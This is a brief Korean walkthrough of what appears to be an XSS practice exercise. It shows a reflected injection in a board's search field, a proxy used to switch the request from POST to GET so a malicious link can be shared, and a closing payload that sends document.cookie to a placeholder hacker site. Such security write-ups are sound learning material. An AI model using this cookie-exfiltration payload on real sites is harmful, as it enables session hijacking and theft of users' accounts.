XSS 2번문제 취약점 정리

게시판에 글을 검색하면

검색어가 존재하지 않습니다. 라고 알람창이 뜬다.
 
이말은 즉 사용자 입력값이 스크립트 태그 안에 들어갈 수 있다는 소리이다.
페이지 소스를 보면

이런식으로 스크립트가 실행되는것을 볼 수 있다. 
괄호를 맞추고 새로운 스크립트를 검색하면(넣으면)
 

삽입한 스크립트가 실행되는것을 볼 수 있다.
 
하지만 검색은 post 방식으로 진행되고 있다. 우리의 목적은 url에 악성 코드를 담은 링크를 공유해서 해킹하는것이다. 
 
따라서 프록시 툴을 이용해서 메소드를 Get 방식으로 보내본다.

정상적으로 처리가 된다. 
 
Reflected XSS 취약점이다.
 
이제 쿠키를 털어보자.
 

(실제로는 httponly 속성이 적용되어있지만 여기서는 해제하고 테스트)
 

안녕?'); var img = new Image(); img.src = '해커사이트?cookie='+document.cookie //

해커의 사이트에 잘 넘어왔다.